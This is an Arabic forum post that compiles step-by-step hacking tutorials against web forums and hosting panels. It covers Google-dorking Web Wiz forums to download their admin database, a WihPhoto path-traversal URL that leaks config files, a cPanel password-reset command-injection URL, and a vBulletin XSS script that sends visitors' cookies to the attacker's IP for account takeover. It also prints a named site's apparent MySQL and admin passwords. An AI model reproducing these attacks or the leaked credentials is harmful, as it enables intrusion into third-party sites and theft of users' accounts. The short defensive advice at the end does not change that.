ثغره منتديات Web Wiz Guide
مثال:
http://host.basharnet.com/forum
الشرح: ثغرة تصيب منتديات Web Wiz Guide
أولا إذهب إلى google
اكتب
Web Wiz forum
وانتظر لحد ماتطلع لك المواقع الي تدعم هذا المنتدى ادخل المنتدى واكتب بعد forum
admin/wwforum.mdb
حمل الملف وادخل عليه عن طريق microsoft office access
بعد ماتاخذ باسوورد المشرف العام اذهب إلى admin
سجل اسمك والباسوورد
الآن أنت في لوحة التحكم
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
يتــــــــــــــــــــــــــــــــبع ][®][^][®][][®][^][®][
ثغرة عبارة عن ثغرة php
هذه الثغرة عبارة عن ثغرة php
هذه الثغرة تعتمد على نظام الاختراق العشوائي
بمعني أننا سنبحث عن هذه الثغرة في المواقع التي تحتوي على هذه الثغرة من خلال محرك البحث جوجل
نضع في خانة البحث
"powered by wihphoto"
طبعا سوف يجد لنا مواقع كثيرة نختار الموقع الأول على سبيل المثال وهو
http://spikies-chinchilla-news.de/p...lerie/admin.php
نقوم بحذف من الموقع admin.php
ونضيف إليه الجمله التالية
sendphoto.php?album=..&pic=config.inc.php
فبالتالي يصبح العنوان لدينا كالتالي
http://spikies-chinchilla-news.de/p...=config.inc.php
ادخل تحت جمله
Sende config.inc.php an
اميلك بالكامل واضغط على زر الارسال
سوف تصلك رسالة فورية بعد ثواني
سوف تصلك على اميلك رسالة بها ملف ملف مرفق اسمه ._albums_.._config.inc.php
عندما تقوم بفتح هذا الملف سوف تجد التالي
FREE FOR NON-COMMERCIAL USE <-- */
/ *************************
*************************
*************************
**/
// WihPhoto Versionsnummer
// =======================
$version = "0.86-dev";
$language = "german.php"; // Sprachfiles z.B. "german.php" fuer Deutsch
// siehe $language Verzeichnis
// http - Adresse:
// ===============
// Bei 0.86-dev noch ohne Bedeutung!
$wihphoto_http = "http://";
// Verzeichnisse:
// ==============
$wihphoto_dir = "/var/www/web1/html/photogallerie"; // Pfad absolut
$wihphotodir = "/var/www/web1/html/photogallerie"; // Pfad absolut
$pix_base = "albums"; // ... die Orginalphotos Pfad relativ
$dyn_base = "auto"; // ... die dynamisch generierten Photos Pfad relativ
$lang_dir = "languages"; // ... language packs Pfad relativ
// WihPhoto - Darstellungsoptionen
// =========================
======
$items_per_page = 20; // maximale Anzahl Photos/Seite
$display_cols = 4; // Spalten pro Seite
$default_size = 512; // Standardbreite der Bilder bei Betrachtung des Albums
$thumb_size = 120; // Breite der generierten Thumpnails
// Breite der Bilder welche generiert werden
// =========================
================
$viewsizes = array(400,512,640,800,"Original");
// Wenn man einen Link zur Hauptseite der Homepage machen mِchte kann er mit $sitehome
// zur Navigationsleiste hinzugefügt werden
// =========================
=========================
=========================
========
$sitehome = "http://spikies-chinchilla-news.de/basefr.htm";
// Startseite von WihPhoto: 1 = Umfangreich, mit Bild, Beschreibung, ....
// 0 = einfache Auflistung der Alben
// =========================
=========================
====================
$startsite = 1;
// MySQL-DB Einstellungen
// ======================
$database = "usr_web1_5"; //MySQL Datenbankname
$sqlhost = "localhost"; //MySQL Hostname
$sqluser = "web1"; //MySQL Username
$sqlpass = "q+q27rym"; //MySQL Passwort
// Passwort zum hinzufügen von Bildinformationstext
// =========================
=======================
$adminpass= "galleriemaster";
// Wird PHP im SAFE MODE betrieben?
// =========================
=======
$safemode = false; // true ... SAFE MODE, false ... kein SAFE MODE
// E-Mail Einstellungen für die "SendPhoto" Funktion
// =========================
========================
$subject = "Spikies-Photogallerie"; // E-Mail Subject
$replyto = "Spike@spikies-chinchilla-news.de"; // Sende E-Mail Adresse
// -----------------------------------------------------------------------
// ab hier keine ؤnderungen notwendig!
// -----------------------------------------------------------------------
// MySQL - Tabellennamen
// =====================
$wp_start = "wp_start"; // Startseite (Albennamen, Albuminfos, Reihung, ...)
$wp_photoinfo = "wp_photoinfo"; // Beschreibungen zu den einzelnen Photos
// Zur Grafikenerzeugung:
// "gd" ... GD (
http://www.boutell.com/gd)
// "im" ... ImageMagick (
http://www.imagemagick.org/)
// =========================
=
$ImageTool = "gd";
// Falls als $ImageTool "im" also ImageMagick gewنhlt wurde
// muss der Pfad zur "convert" Funktion angegeben werden!
$convert = "/usr/bin/convert";
// EXIF Support
// (funkt noch nicht!)
// ===================
$show_exif = 0;
// Rand bei Thumpnails
// ===================
$thumb_border = 1;
// Sprachfiles laden:
require ("$wihphoto_dir/$lang_dir/$language");
?>
*************************
*************************
*************************
******
ولكن اعتقد أن أهم شئ من هذا الملف كله هو هذا المقطع
// MySQL-DB Einstellungen
// ======================
$database = "usr_web1_5"; //MySQL Datenbankname
$sqlhost = "localhost"; //MySQL Hostname
$sqluser = "web1"; //MySQL Username
$sqlpass = "q+q27rym"; //MySQL Passwort
// Passwort zum hinzufügen von Bildinformationstext
// =========================
=======================
$adminpass= "galleriemaster";
حيث يذكر لن االباسووردات الخاصة بالموقع وقاعدة البيانات :8: :8:
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
ثغره لوحه التحكم المواقع Cpanel للكاتب SmaRt
المعروف أن Cpanel هي لوحة تحكم تضاف للمواقع لإمكانية التحكم في جميع ما يحتويه الموقع
يوجد منفذ لعمل دفع أو ما يسمونه أمر ريموت في البرنامج Cpanel
اكتشفت ثغرة في هذا المنفذ الذي يظهر المطلوب لتصحيح النقص الخارجي أو
الذي يكون مزود ببيانات للسكربت الذي يقوم باسترجاع الاسم والرقم السري
الهكرز طبعا استغلوا هذه الثغرة من المشكلة بدهاء وبراعة حيث يطلبون الURI كأنهم يستخدمون السكربت عادي
ليجهزوا خاصية الشيل والأوامر التحكمية لكل قيمة ومتغير (خلصنا مناقشة )
نأتي الآن للنسخ المصابة وهي :
cPanel cPanel 5.0
cPanel cPanel 5.3
cPanel cPanel 6.0
cPanel cPanel 6.2
cPanel cPanel 6.4
cPanel cPanel 6.4.1
cPanel cPanel 6.4.2 .STABLE_48
cPanel cPanel 6.4.2
cPanel cPanel 7.0
cPanel cPanel 8.0
cPanel cPanel 9.0
cPanel cPanel 9.1
والثغرة تطبق على النحو التاالي :
ls"|" target="_blank">http://www.example.com:2082/resetpass/?use...t;>ls"|
حيث ان example.com هو عنوان الموقع
اعذروني لاني ما جربت الثغرة الى الان لاني اول ما قرأتها وضعتها لكم
طريقة اكتشاف الثغرة :
وصلت رسالة الى موقع
www.securityfocus.com
من Arab ViruZ أحد أعضاء Saudi Devilz Team
والرسالة على النحو التالي (ترجمتها) :-
العنوان : Cpanel 8 تحتوي على مشكلة ؟؟
البريد : Arab VieruZ <arabviersus hotmail com>
مرحبا جميعا
عندما جربت ارجع الباسورد تبعي
جربت هذه الوصلة :
ls"|" target="_blank">http://cpanel.com:2082/resetpass/?user=|">ls"|
لكنني حصلت على هذا :
*/
sh: line 1: /var/cpanel/users/: is a directory "sh: line 1: >ls: command not found"
Password Reset
Resetting password for |">ls"|: A confirmation email has been sent to the email address
on file.
*/
انظر الى هذه
sh: line 1: >ls: command not found
هل هذه مشكلة
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
الموضوع : اختراق الـ vBulletin
المتطلبات : WebServer (تركيب سيرفر على جهازك الشخصي) + متصفح انترنت (اكسبلورر) .
المستوى : متوسط
ملاحظة : هذه الطريقة لست للـ vBulletin فقط !! يمكن ان تجربها على انواع اخرى من المنتديات .
---------------------------------------------------
---------------------------------------------------
تنقسم طريقة العمل الى عدة اقسام .. أولا بعض السكربتات الخبيثة التي تسرق الكوكيز بالاضافة الى جعل المنتدى يستقبل
بيانات من مكان خاطيء .. لكن يشترط ان يسمح المنتدى بأكواد الـ HTML ..
قم بكتابة موضوع جديد او رد (في منتدى يدعم الـ HTML ) .. ثم اكتب اي موضوع والصق بين السطور هذا الكود :
<script>document.write('[img]http://my_ip_address/'+****************+'[/img]';</script>
مع ملاحظة تغير الـ IP Adress الى رقم الـ IP الخاص بك .
وعندما يقوم شخص ما بقراءة محتوى الصفحة فان السكربت الذي قمنا بوضعه سيقوم بتنفيذ الاوامر في جهاز وقراءة جزء
من احد ملفات الكوكيز التي تحتوي على الباسورد الخاصة بالمنتدى .. ثم يقوم السكربت بتحويل هذه السطور الى رقم
الاي بي الذي قمنا بكتابته سابقا (مع ملاحظة انه يجب ان يكون على جهازي سيرفر مثل IIS او Apache او غيرها ) .
وبعد ان تتم العملية بنجاح قم بفتح ملف الـ Log الخاص بالسيرفر الذي يحتويه جهازك ..
مثال لو كان السيرفر ا****ي .. فتاح المجلد Apche واختر logs واختر Acces Log .
ستجد جميع الاوامر التي طلبتها من السيرفر .. إلخ
ابحث عن الكود الخاص بالباسورد .. مثال :
GET/ bbuserid=86;%20bbpassword=dd6169d68822a116cd97e1b
ddf90622;%20sessionhash=a
4719cd620534914930b86839c4bb5f8;%20bbthreadview[54
20]=1012444064;%20bblastvi
sit=1011983161
فكر قليلا الان .. اين الباسورد ؟؟
الباسورد موجود لكن بطريقة مشفرة يصعب كسرها .. اذن مالحل ؟
قم بنسخ الكود الذي وجدته والصقه في المتصفح .. بهذا الشكل
http://www.victim.com/vb/index.php?bbuserid=[userid]&bbpassword=[password hash]
ستجد عبارة : " أهلا بعودتك يـا ( اسم الذي سرقت منه الكوكيز....) "
في هذه الحالة انت الان تستطيع التحكم بكل شي وكانك مدير المنتدى (الذي سرقت منه الكوكيز) ..
لكننا نحتاج الى كلمة المرور للدخول الى لوحة التحكم .. اذهب الى (التحكم) وقم بتعديل البريد الالكتروني الى بريدك الخاص
وثم قم بتسجيل الخروج .. ثم اذهب الى اداة Forgot Password .. وعندها تستطيع استقبال بريد يحتوي باسورد الادمن ..
اعتقد انك تعلم ما يجب ان تفعله بعد ذلك !! ادخل الى لوحة التحكم وافعل ما تشاء .. !
---------------------------------------------------
الحل
---------------------------------------------------
للحماية من هذه الثغرة قم باغلاق الـ HTML في (المنتدى + الرسائل الخاصة + التواقيع + التقويم + ... )
(واي منفذ يمكن من خلاله وضع كود HTML باي صورة كانت )
كما يجب اغلا كود الـ IMG .. لانه ببساطة بامكانك استخدامه بدل كلمة <script> فاذا وضعت <img> او <Demon> او
اي كلمة اخرى فانه سيتم تنفيذ السكربت بشكل او باخر ... لذا كن حذرا واغلق هذه المنافذ .
Be Secret .. Dont' be Lamer . .
منقول الكاتب الاصلي الوطواط الاحمر
أرجو أن تستخدموا هذه الطريقة ضد العدو وألا تستخدموها ضد إخوانكم العرب والمسلمين
منقووووول للفائدة
تحياتي للجميع